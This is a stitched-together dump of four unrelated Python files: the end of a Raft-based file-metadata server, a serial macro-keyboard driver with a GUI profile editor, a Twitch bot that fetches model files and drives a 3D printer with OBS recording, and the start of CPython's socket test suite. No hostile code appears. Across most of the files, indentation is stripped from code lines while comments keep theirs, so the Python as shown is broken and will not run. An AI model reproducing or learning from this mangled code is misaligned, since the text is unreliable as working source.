state = FOLLOWER
currentTerm = term
votedFor = -1
if currentTerm == term:
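        # Grant the vote only if we have not already voted for someone else
        # this term and the candidate's log looks at least as up to date as
        # ours (a simplified version of Raft's up-to-date check).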
        if (votedFor == -1 or votedFor == candidateId) and \
                (not log or (lastLogIndex >= len(log) - 1 and lastLogTerm >= log[-1][0])):
votedFor = candidateId
timer = time()
res = True
return currentTerm, res
def commit():
global lastApplied
# print('commit', lastApplied, commitIndex)
while lastApplied < commitIndex:
lastApplied += 1
_, (filename, version, blocklist) = log[lastApplied]
FileInfoMap[filename] = (version, blocklist)
# Updates fileinfomap
def appendEntries(term, entries, leaderCommit):
"""Updates fileinfomap to match that of the leader"""
if state == CRASHED:
return -1, False
global log, commitIndex, lastApplied, timer
res = False
print('appendEntries', leaderCommit, commitIndex, entries)
if term >= currentTerm:
if term > currentTerm:
toFollower(term)
else:
timer = time()
res = True
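        # Note: this implementation ships the leader's entire log in every
        # AppendEntries call and simply overwrites the local log with it,
        # rather than performing Raft's prevLogIndex/prevLogTerm consistency
        # check.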
log = entries
if leaderCommit > commitIndex:
commitIndex = min(leaderCommit, len(log) - 1)
return currentTerm, res
def tester_getversion(filename):
return FileInfoMap[filename][0]
def getVote(serverId, votes):
global state, matchIndex
try:
term, voteGranted = servers[serverId].surfstore.requestVote(currentTerm, serverNum, len(log) - 1,
log[-1][0] if log else 0)
if state == CANDIDATE:
if voteGranted:
# prevent votes of previous election polluting current election
if term == currentTerm:
votes[0] += 1
if votes[0] + 1 > (len(servers) + 1) / 2:
state = LEADER
matchIndex = [-1] * len(servers)
else:
if term > currentTerm:
toFollower(term)
except Exception as e:
print(str(e))
def heartbeat(sc):
global commitIndex
if state == LEADER:
print('heartbeat', log, commitIndex)
for i, server in enumerate(servers):
try:
term, success = server.surfstore.appendEntries(currentTerm, log, commitIndex)
if success:
matchIndex[i] = len(log) - 1
elif term != -1:
raise Exception('heartbeat failed')
if term > currentTerm:
toFollower(term)
return
except Exception as e:
print(str(e))
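        # Leader commit rule: advance commitIndex to the largest N whose entry is from
        # currentTerm and is stored on a majority of nodes (matchIndex plus the leader
        # itself), then apply the newly committed entries through commit().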
N = commitIndex + 1
while (N < len(log) and log[N][0] == currentTerm and sum(i >= N for i in matchIndex) + 1 >
(len(servers) + 1) / 2):
N += 1
if commitIndex < N - 1:
commitIndex = N - 1
commit()
sc.enter(0.15, 1, heartbeat, (sc,))
# Reads the config file, returns this server's host and port, and collects the
# other servers' host:port strings into serverlist
def readconfig(config, servernum):
    """Reads the config file"""
fd = open(config, 'r')
l = fd.readline()
maxnum = int(l.strip().split(' ')[1])
if servernum >= maxnum or servernum < 0:
raise Exception('Server number out of range.')
d = fd.read()
d = d.splitlines()
host = 0
port = 0
for i in range(len(d)):
hostport = d[i].strip().split(' ')[1]
if i == servernum:
host = hostport.split(':')[0]
port = int(hostport.split(':')[1])
else:
serverlist.append(hostport)
return maxnum, host, port
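# Based on how readconfig() parses the file, the config is assumed to look roughly
# like the sketch below (names and ports are only illustrative):
#
#   maxnum 3
#   metadata0 localhost:9001
#   metadata1 localhost:9002
#   metadata2 localhost:9003
#
# The first line carries the server count after a space; each following line carries
# a "name host:port" pair, and the entry whose position equals servernum is this server.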
if __name__ == "__main__":
try:
parser = argparse.ArgumentParser(description="SurfStore server")
parser.add_argument('config', help='path to config file')
parser.add_argument('servernum', type=int, help='server number')
args = parser.parse_args()
config = args.config
servernum = args.servernum
# server list has list of other servers
serverlist = []
# config = 'config.txt'
# servernum = 2
# maxnum is maximum number of servers
maxnum, host, port = readconfig(config, servernum)
print("Attempting to start XML-RPC Server...")
print(host, port)
server = threadedXMLRPCServer((host, port), requestHandler=RequestHandler)
server.register_introspection_functions()
server.register_function(ping, "surfstore.ping")
server.register_function(getblock, "surfstore.getblock")
server.register_function(putblock, "surfstore.putblock")
server.register_function(hasblocks, "surfstore.hasblocks")
server.register_function(getfileinfomap, "surfstore.getfileinfomap")
server.register_function(updatefile, "surfstore.updatefile")
# Project 3 APIs
server.register_function(isLeader, "surfstore.isLeader")
server.register_function(crash, "surfstore.crash")
server.register_function(restore, "surfstore.restore")
server.register_function(isCrashed, "surfstore.isCrashed")
server.register_function(requestVote, "surfstore.requestVote")
server.register_function(appendEntries, "surfstore.appendEntries")
server.register_function(tester_getversion, "surfstore.tester_getversion")
for hostport in serverlist:
connection = xmlrpc.client.ServerProxy("http://" + hostport + '/RPC2', use_builtin_types=True)
servers.append(connection)
serverNum = servernum
timer = time()
def daemon():
global state, currentTerm, timer, votedFor
while True:
# print(state, currentTerm, timer)
# sleep(1)
if state != CRASHED:
commit()
if state == FOLLOWER:
if time() - timer > timeout:
state = CANDIDATE
elif state == CANDIDATE:
if time() - timer > timeout:
print('candidate timeout', timeout)
currentTerm += 1
timer = time()
votedFor = serverNum
votes = [0]
for i in range(len(servers)):
th = Thread(target=getVote, args=(i, votes))
th.start()
if state != CANDIDATE:
break
elif state == LEADER:
s = sched.scheduler(time, sleep)
s.enter(0, 1, heartbeat, (s,))
s.run()
p = Thread(target=daemon)
p.start()
print("Started successfully.")
print("Accepting requests. (Halt program to stop.)")
server.serve_forever()
except Exception as e:
print("Server: " + str(e))
|
main.py
|
import sys
import glob
import serial
from pymouse import PyMouse
from pykeyboard import PyKeyboard
import pymouse
import pykeyboard
import PySimpleGUI as sg
from configobj import ConfigObj
import configobj
import multiprocessing
from multiprocessing import Process, Value, Array
from queue import Queue
import queue
import time
import ctypes
import retrying
from retrying import retry
m = PyMouse()
k = PyKeyboard()
def newConf(Name):
config = ConfigObj("setting.ini",encoding='UTF8')
config[Name] = {}
config[Name]['K01'] = 'A'
config[Name]['K02'] = 'B'
config[Name]['K03'] = 'C'
config[Name]['K04'] = 'D'
config[Name]['K05'] = 'E'
config[Name]['K06'] = 'F'
config[Name]['K07'] = 'G'
config[Name]['K08'] = 'H'
config[Name]['K09'] = 'I'
config[Name]['K10'] = 'J'
config[Name]['K11'] = 'K'
config[Name]['K12'] = 'L'
config[Name]['EC1_Left'] = 'Z'
config[Name]['EC1_SW'] = 'X'
config[Name]['EC1_Right'] = 'C'
config[Name]['EC2_Left'] = 'V'
config[Name]['EC2_SW'] = 'B'
config[Name]['EC2_Right'] = 'N'
config.write()
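# For reference, newConf("DEFAULT") leaves a section in setting.ini shaped roughly
# like the sketch below (ConfigObj writes one "key = value" pair per line):
#
#   [DEFAULT]
#   K01 = A
#   K02 = B
#   ...
#   EC1_Left = Z
#   EC1_SW = X
#   EC1_Right = C
#   EC2_Left = V
#   EC2_SW = B
#   EC2_Right = N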
def writeConf(Key, Cmd, List):
if isinstance(Key, list):
config = ConfigObj("setting.ini",encoding='UTF8')
for i in Key:
for j in Cmd:
config[List][i] = j
config.write()
if isinstance(Key, str):
config = ConfigObj("setting.ini",encoding='UTF8')
config[List][Key] = Cmd
config.write()
def readConf(List, Key=None):
if Key is None:
config = ConfigObj("setting.ini",encoding='UTF8')
Cmd = config[List]
else:
config = ConfigObj("setting.ini",encoding='UTF8')
Cmd = config[List][Key]
    return Cmd  # returns either a single command string or the dict of all commands for the profile
def readList():  # get the names of all profiles
config = ConfigObj("setting.ini",encoding='UTF8')
List = config.keys()
    return List  # returns a list containing all profile names
def delList(List):
config = ConfigObj("setting.ini",encoding='UTF8')
del config[List]
config.write()
def decodeList(Cmd):  # decode a multi-key binding
if "+" in Cmd:
decodeCmd = Cmd.split('+')
else:
decodeCmd = Cmd
    return decodeCmd  # returns a str for a single key or a list for a combination
def checkList(Cmd):  # check whether a binding is a multi-key combination
    if "+" in Cmd:
        return True  # multi-key binding
    else:
        return False  # single-key binding
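# For example: checkList('Ctrl+C') is True and decodeList('Ctrl+C') returns
# ['Ctrl', 'C'], while checkList('A') is False and decodeList('A') returns 'A'.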
def choiceValue(callback, t):
decodeValue = callback[t]
return decodeValue
@retry(wait_fixed=5000)
def serial_ports():
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
        # this excludes the current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
    if len(result) == 0:
        raise Exception  # nothing found: raise so that @retry tries again after 5 seconds
    return result
def readLowPc(ser):
    count = ser.inWaiting()  # number of bytes waiting in the serial buffer
    recv = str(ser.readline()[0:-2].decode("utf8"))  # read one line from the MCU, UTF-8 encoded
    return recv  # returns a str
def readLowPcList(ser):
    count = ser.inWaiting()  # number of bytes waiting in the serial buffer
    recv = str(ser.readline()[0:-2].decode("utf8"))  # read one line from the MCU, UTF-8 encoded
    return recv.split('_')  # returns a list
def splitLowPcKey(key):
    return key.split('_')  # returns a list
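# The report strings read from the MCU are assumed (from the PdevKeys/RdevKeys
# tables in setKey below) to follow a "<key>_<event>" pattern, e.g. "A_P" for key A
# pressed, "A_R" for key A released, and "D1_1" / "D1_-1" for one step of rotary
# encoder 1 in either direction.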
def findDevice():
tty = serial_ports()
for devId in tty:
ser = serial.Serial(devId, 115200)
t = 0
while t < 12000:
print("查找次数:", t)
ser.write('Check'.encode("utf8")) # 发送Check命令
count = ser.inWaiting() # 获取串口缓冲区数据
t += 1
if count !=0 :
recv = str(ser.readline()[0:-2].decode("utf8")) # 读出串口数据,数据采用utf8编码
if recv == "this": # 检测下位机是否返回数据
ser.close()
return devId
break
def setKey(setKeyValue, newConfValue):
    device = findDevice()  # locate the serial device ID of the MCU
    print("找到的设备:", device)
    ser = serial.Serial(device, 115200)  # open the serial link to the MCU
PdevKeys = {'A_P': 'K01', 'B_P': 'K02', 'C_P': 'K03', 'D_P': 'K04',
'E_P': 'K05', 'F_P': 'K06', 'G_P': 'K07', 'H_P': 'K08',
'I_P': 'K09', 'J_P': 'K10', 'K_P': 'K11', 'L_P': 'K12',
'SW1_P': 'EC1_SW', 'SW2_P': 'EC2_SW',
'D1_1': 'EC1_Left', 'D1_-1': 'EC1_Right',
                'D2_1': 'EC2_Left', 'D2_-1': 'EC2_Right'}  # reports sent by the MCU when a key is pressed or an encoder turns
RdevKeys = {'A_R': 'K01', 'B_R': 'K02', 'C_R': 'K03', 'D_R': 'K04',
'E_R': 'K05', 'F_R': 'K06', 'G_R': 'K07', 'H_R': 'K08',
'I_R': 'K09', 'J_R': 'K10', 'K_R': 'K11', 'L_R': 'K12',
                'SW1_R': 'EC1_SW', 'SW2_R': 'EC2_SW'}  # reports sent by the MCU when a key is released
    allList = readList()  # read all profile names from the config file
    nowConf = readConf(allList[setKeyValue.value])  # dict of commands for the current profile
    while True:
        if newConfValue.value == 1:  # the GUI changed or created a profile: reload it
            allList = readList()
            nowConf = readConf(allList[setKeyValue.value])  # dict of commands for the current profile
            newConfValue.value = 0
        key = readLowPc(ser)  # read the next report string from the MCU
        for i in PdevKeys.keys():
            if newConfValue.value == 1:  # the GUI changed or created a profile: reload it
                allList = readList()
                nowConf = readConf(allList[setKeyValue.value])  # dict of commands for the current profile
newConfValue.value = 0
if key == i:
                if checkList(nowConf[PdevKeys[i]]) is True:  # binding contains '+': press the key combination
                    k.press_keys(decodeList(nowConf[PdevKeys[i]]))
                elif checkList(nowConf[PdevKeys[i]]) is False:  # single key or mouse-wheel action
if nowConf[PdevKeys[i]] == 'left':
m.scroll(1, 0)
elif nowConf[PdevKeys[i]] == 'right':
m.scroll(-1, 0)
elif nowConf[PdevKeys[i]] == 'up':
m.scroll(0, 1)
elif nowConf[PdevKeys[i]] == 'down':
m.scroll(0, -1)
else:
k.press_key(nowConf[PdevKeys[i]])
for i in RdevKeys.keys():
            if newConfValue.value == 1:  # the GUI changed or created a profile: reload it
                allList = readList()
                nowConf = readConf(allList[setKeyValue.value])  # dict of commands for the current profile
                newConfValue.value = 0
            if key == i:
                if checkList(nowConf[RdevKeys[i]]) is False:  # single key: release it
k.release_key(nowConf[RdevKeys[i]])
# GUI main loop (keeps the window alive)
def gui():
    # set the PySimpleGUI theme; without this the default theme is used
    sg.ChangeLookAndFeel('DarkAmber')
    # font-size constants used by the layout below, so fonts don't have to be set element by element
    FONT1 = (16)
    FONT2 = (20)
    FONT3 = (30)
    # fill the drop-down menu with all profile names
    Comobo = readList()
    # window layout
layout = [
[sg.Text('EC1配置', font=(FONT2), size=(20, 1))],
[sg.Text('左转'), sg.InputText('<--', key='EC1_Left', size=(10, 5), font=(FONT1)), sg.Text('中键'), sg.InputText('SW', key='EC1_SW', size=(10, 5), font=(FONT1)), sg.Text('右转'), sg.InputText('-->', key='EC1_Right', size=(10, 5), font=(FONT1)), ],
[sg.Text('EC2配置', font=(FONT2), size=(20 ,1))],
[sg.Text('左转'), sg.InputText('<--', key='EC2_Left', size=(10, 5), font=(FONT1)), sg.Text('中键'), sg.InputText('SW', key='EC2_SW', size=(10, 5), font=(FONT1)), sg.Text('右转'), sg.InputText('-->', key='EC2_Right', size=(10, 5), font=(FONT1)), ],
[sg.HorizontalSeparator()],
[sg.Text('自定义按键配置', font=(FONT2))],
[sg.Text('K01'), sg.InputText('K01', key='K01', size=(10, 8), font=(FONT3)), sg.Text('K02'), sg.InputText('K02', key='K02', size=(10, 8), font=(FONT3)), sg.Text('K03'), sg.InputText('K03', key='K03', size=(10, 8), font=(FONT3)), sg.Text('K04'), sg.InputText('K04', key='K04', size=(10, 8), font=(FONT3)), ],
[sg.Text('K05'), sg.InputText('K05', key='K05', size=(10, 8), font=(FONT3)), sg.Text('K06'), sg.InputText('K06', key='K06', size=(10, 8), font=(FONT3)), sg.Text('K07'), sg.InputText('K07', key='K07', size=(10, 8), font=(FONT3)), sg.Text('K08'), sg.InputText('K08', key='K08', size=(10, 8), font=(FONT3)), ],
[sg.Text('K09'), sg.InputText('K09', key='K09', size=(10, 8), font=(FONT3)), sg.Text('K10'), sg.InputText('K10', key='K10', size=(10, 8), font=(FONT3)), sg.Text('K11'), sg.InputText('K11', key='K11', size=(10, 8), font=(FONT3)), sg.Text('K12'), sg.InputText('K12', key='K12', size=(10, 8), font=(FONT3)), ],
[sg.HorizontalSeparator()],
[sg.Combo(Comobo, size=(8, 1), font=(FONT2), key='_nowList', default_value="DEFAULT"), sg.Btn('新建配置', key='_newConf', font=(FONT2), size=(8, 1)), sg.Btn('删除配置', key='_delConf', font=(FONT2), size=(8, 1)), sg.Btn('读取配置', key='_readConf', font=(FONT2), size=(8, 1)), sg.Btn('保存配置', key='_saveConf', font=(FONT2), size=(8, 1)), sg.Btn('配置说明', key='_aboutConf', font=(FONT2), size=(8, 1)), sg.Btn('关于', key='_about', font=(FONT2), size=(8, 1))]
]
    # create the window from the layout and finalize it
    # a window needs a title, which is shown in the title bar
    window = sg.Window('HotKeyKeyboard驱动程序', layout=layout, finalize=True)
    # event loop; without it the window would close after a single pass
    while True:
        # wait for the next window event
        event, value = window.Read()
        # handle events (buttons are bound to events; clicking a button fires its event)
        # every sg.Input()/sg.Btn() has a key, which is used to read or update that element
        if event == '_newConf':
            newConfName = sg.PopupGetText('配置名称') # popup asking for the new profile's name
            newConf(newConfName) # add the new profile to the config file
            Comobo = readList() # reload the list of all profiles
            window.Element("_nowList").Update(value=newConfName, values=Comobo) # refresh the drop-down menu
        if event == '_readConf':
            nowList = value['_nowList'] # profile currently selected in the drop-down menu
            Cmd = readConf(nowList) # read that profile (a dict)
            keys = Cmd.keys() # all keys of the profile dict
            setKeyValue.value = readList().index(nowList) # pass the selected profile's index to the shared variable
            newConfValue.value = 1 # tell the key-mapping process to reload its profile
            i = 0
            for i in keys: # walk over every key of the profile dict
                sgCmd = Cmd[i] # value bound to the current key
                print("keys: " + i + " sgCmd: " + sgCmd)
                window[i].Update(value=sgCmd) # show sgCmd in the matching input box
if event == '_saveConf':
uiKeys = ['K01', 'K02', 'K03', 'K04',
'K05', 'K06', 'K07', 'K08',
'K09', 'K10', 'K11', 'K12',
'EC1_Left', 'EC1_SW', 'EC1_Right',
                      'EC2_Left', 'EC2_SW', 'EC2_Right'] # IDs of every customizable key in the GUI
            newConfValue.value = 1 # tell the key-mapping process to reload its profile
            i = 0
            for i in uiKeys:
                writeConf(i, value[i], value['_nowList']) # write the value shown in the GUI into the selected profile
        if event == '_delConf':
            nowList = value['_nowList'] # profile currently selected in the drop-down menu
            delList(nowList)
            Comobo = readList() # reload the list of all profiles
            window.Element("_nowList").Update(value='DEFAULT', values=Comobo) # refresh the drop-down menu
if event == '_aboutConf':
sg.PopupAnnoying('配置说明\n1. 按下单个按键请输入单个按键名称\n2. 按下多个按键请以“+”为分隔符输入多个按键名称\n3. 鼠标滚轮对应键为,上:up,下:down,左:left,右:right\n4. 多功能键请输入全称,如Command,Alt,Ctrl', font=(FONT2))
if event == '_about':
sg.PopupAnnoying('作者碎碎念\n\n这算是我用Py写的第一个图形化软件,不得不说图形化真的很难写\n要去想要去设计要去注意的点太多了。\n在写这个程序的时候我经常写到一半就忘记了之前写过什么功能\n导致这个软件花了我一个晚上才糊出来(笑)。\n希望能够正常运行吧!\n', font=(FONT2))
if event is None:
tKey.terminate()
break
window.close()
if __name__ == '__main__':
    # multiprocessing setup (needed e.g. for frozen Windows executables)
    multiprocessing.freeze_support()
    # shared variables between the GUI and the key-mapping process
    setKeyValue = Value("i", 0)
    newConfValue = Value("i", 0)
    tKey = Process(target=setKey, daemon=True, args=(setKeyValue, newConfValue, ))
    # start the key-mapping process and the GUI
tKey.start()
gui()
|
doprints.py
|
from twitchio.ext import commands
import asyncio
import csv
import tempfile
import os
import sys
import subprocess
from obswebsocket import obsws, requests, events
import zipfile
from pathlib import Path
import threading
import signal
import time
import my_settings
global plz_stop
plz_stop = False
printing = "Loading..."
class Bot(commands.Bot):
def __init__(self):
# Initialise our Bot with our access token, prefix and a list of channels to join on boot...
super().__init__(token=my_settings.ACCESS_TOKEN, prefix='?', initial_channels=my_settings.CHANNEL)
async def event_ready(self):
# We are logged in and ready to chat and use commands...
print(f'Logged in as | {self.nick}')
@commands.command()
async def hello(self, ctx: commands.Context):
# Send a hello back!
await ctx.send(f'Hello {ctx.author.name}!')
@commands.command()
async def printing(self, ctx: commands.Context):
await ctx.reply(f'Currently printing {printing}')
async def update_printing(self, printing: str):
await self.connected_channels[0].send(f'Now printing {printing}')
async def update_status(self, status):
from datetime import datetime
from datetime import timedelta
last_update = datetime.now()
for l in status:
if datetime.now() - last_update > timedelta(minutes=5):
last_update = datetime.now()
await self.connected_channels[0].send(f'Print status {l}')
async def fetching(self, url: str, desc: str):
await self.connected_channels[0].send(f'Now fetch URL {url} for printing...')
await self.connected_channels[0].send(f'The description for this item is:')
c = 0
while (c == 0 or c < len(desc)-400 and c < 800):
await self.connected_channels[0].send(desc[c:c+400])
c += 400
bot = Bot()
bot_thread = threading.Thread(target=bot.run)
bot_thread.start()
# Register a signal handler for a gentle shutdown option
def handler(signum, frame):
global plz_stop
print('Signal handler called with signal', signum)
if plz_stop:
# Multiple ctrl-c exit now
sys.exit(1)
plz_stop = True
return True
# Set the signal handler
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
time.sleep(10)
count = 0
try:
with open("count") as countin:
count = int(next(countin))
except:
pass
global recording_file
recording_file = None
def on_event(message):
global recording_file
if not isinstance(message, events.StreamStatus):
print(u"Got message: {}".format(message))
try:
if message.getRecordingFilename():
recording_file = message.getRecordingFilename()
print(f"updated recording file name to {recording_file}")
except BaseException as err:
print(f"Error {err} updating")
pass
candidates = None
obs_client = obsws("localhost", 4444, "secret")
obs_client.connect()
obs_client.register(on_event)
endG = """M107 ; disable cooling fan
M106 P0 S0 ; disable cooling fan
M104 S0 ; shut down hot end
M140 S0 ; shut down bed
G92 E1 ; set filament position
G1 E-1 F300 ; retract filament
G28 X ; home X axis
G1 Y50 F1000 ; lift y axis
M84 ; disable stepper motors
"""
finished = {}
# Load already finished
try:
with open('done.csv') as donefile:
        done_candidates = csv.DictReader(donefile, quoting=csv.QUOTE_NONNUMERIC, escapechar='\\')  # done.csv carries a header row, so no explicit fieldnames are needed
for candidate in done_candidates:
finished[candidate['file_url']] = 1
except:
pass
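# candidates.csv is expected to have a header row with at least the columns
# file_url, friendly_url, title and description (the fields read in the loop below);
# done.csv gets its header written a few lines further down if it does not exist yet.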
with open('candidates.csv', newline='') as infile:
candidates = csv.DictReader(infile, quoting=csv.QUOTE_NONNUMERIC, escapechar='\\')
# Write out the header if the done file doesn't exist yet.
try:
open('done.csv')
except:
with open('done.csv', "w") as donefile:
fieldnames = ['file_url', 'friendly_url', 'title', 'description', 'id', 'recording_file']
done_writer = csv.DictWriter(donefile, fieldnames = fieldnames, quoting=csv.QUOTE_NONNUMERIC, escapechar='\\')
done_writer.writeheader()
with open('done.csv', "a") as donefile:
count = count + 1
with open("count", "w") as countout:
countout.write(str(count))
    fieldnames = ['file_url', 'friendly_url', 'title', 'description', 'id', 'recording_file']
    done_writer = csv.DictWriter(donefile, fieldnames = fieldnames, quoting=csv.QUOTE_NONNUMERIC, escapechar='\\')
for candidate in candidates:
print(f"Handling candidate {candidate}")
if plz_stop:
break
if candidate["file_url"] in finished:
continue # Skip finished candidates
recording_file = None
obs_client.call(requests.StartRecording())
files_printed = 0
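            # Per-candidate pipeline: download the file (axel), unzip if needed,
            # convert each extracted file to STL (conv.py), slice it to G-code
            # (kirimoto-slicer with printer.json), then stream the G-code to the
            # printer with printcore and report progress to chat.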
try:
with tempfile.TemporaryDirectory() as temp_dir:
# Skip any things we can't download it's probably transient.
try:
ext = candidate['file_url'].split(".")[-1]
path_to_file = f"{temp_dir}/a.{ext}"
asyncio.run(bot.fetching(candidate['file_url'], candidate['description']))
subprocess.run(["axel", candidate['file_url'], '-o', path_to_file])
if ext == "zip" or ext == "ZIP":
with zipfile.ZipFile(path_to_file, 'r') as zip_ref:
zip_ref.extractall(temp_dir)
except Exception as e:
print(f"Error {e} handling {candidate}")
continue
for path in Path(temp_dir).rglob('*'):
conv_process = subprocess.run(["python3", "conv.py", path])
returncode = conv_process.returncode
if returncode != 0:
print(f"Error converting {path}")
continue
stl = f"{path}.stl"
cmd = [
"kirimoto-slicer",
"--load=printer.json",
str(stl)
]
print(f"Running {cmd}")
slice_process = subprocess.run(cmd)
returncode = slice_process.returncode
if returncode != 0:
print(f"Error slicing {stl}")
continue
gcode = f"{path}.gcode"
printing = f"Printing {candidate['title']} file {gcode} from {candidate['friendly_url']}"
asyncio.run(bot.update_printing(printing))
print_proc = subprocess.Popen(["printcore", "-s", "/dev/ttyUSB0", gcode], stdout=subprocess.PIPE)
outs, errs = print_proc.communicate()
asyncio.run(bot.update_status(outs))
print_proc.poll()
returncode = print_proc.returncode
if (returncode == 0):
files_printed = files_printed + 1
except Exception as e:
print(f"Error {e} printing candidate {candidate}")
pass
finally:
pass
# Stop the recording
obs_client.call(requests.StopRecording())
# Wait for the recording_file to become present
while True:
        time.sleep(10)
print(f"Waiting for recording file to exist {recording_file}....")
if recording_file is not None:
print(f"Huzzah recorded as {recording_file}")
break
else:
print(f"No recording in {recording_file}")
done_writer.writerow({
"file_url": candidate['file_url'],
"friendly_url": candidate['friendly_url'],
"title": candidate['title'],
"description": candidate['description'],
"id": count,
"recording_file": recording_file})
donefile.flush()
sys.exit(0)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import string
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
try:
import _thread as thread
import threading
except ImportError:
thread = None
threading = None
try:
import _socket
except ImportError:
_socket = None
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
if threading:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
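    # Illustrative only: a raw frame would be packed as
    #   struct.pack(can_frame_fmt, can_id, len(data), data)
    # and taken apart again with struct.unpack(can_frame_fmt, frame).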
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
self.clientSetUp()
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
